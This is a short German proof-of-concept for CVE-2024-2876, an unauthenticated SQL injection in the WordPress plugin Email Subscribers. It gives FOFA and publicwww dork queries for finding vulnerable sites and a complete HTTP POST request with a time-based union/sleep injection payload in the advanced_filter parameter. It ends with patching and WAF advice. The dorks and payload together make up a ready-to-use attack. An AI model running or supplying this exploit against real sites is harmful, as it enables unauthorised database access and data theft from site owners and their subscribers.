
Proof-of-Concept für CVE-2024-2876, eine unauthentifizierte SQL-Injection im WordPress-Plugin Email Subscribers, mit Dork-Queries und einer funktionierenden Exploit-Anfrage.
#Beschreibung der Schwachstelle: Das Plugin Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce für WordPress ist in allen Versionen bis einschließlich 5.7.14 über die Funktion 'run' der Klasse 'IG_ES_Subscribers_Query' anfällig für SQL-Injection, da der vom Benutzer bereitgestellte Parameter unzureichend escaped wird und die vorhandene SQL-Abfrage nicht ausreichend vorbereitet wird. Dadurch ist es unauthentifizierten Angreifern möglich, zusätzliche SQL-Abfragen an bereits bestehende Abfragen anzuhängen, mit denen sensible Informationen aus der Datenbank extrahiert werden können.
#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"
#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE
#Wie behebt man das? Da alle Versionen bis 5.7.14 mit der CVE erkannt wurden, wird Benutzern empfohlen, das Plugin Email Subscribers by Icegram Express auf Version 5.7.15 (oder die neueste Version 5.7.19) zu aktualisieren. Patchstack-Benutzer haben die Möglichkeit, automatische Updates speziell für anfällige Plugins zu aktivieren. Implementieren Sie eine WAF/WAAP-Lösung als zusätzliche Schutzschicht. Der Vorteil solcher Lösungen besteht darin, dass selbst wenn die Schwachstelle neu und unbekannt ist (0-day), Angriffe möglicherweise trotzdem verhindert werden können, indem Exploit-Muster und -Techniken erkannt werden.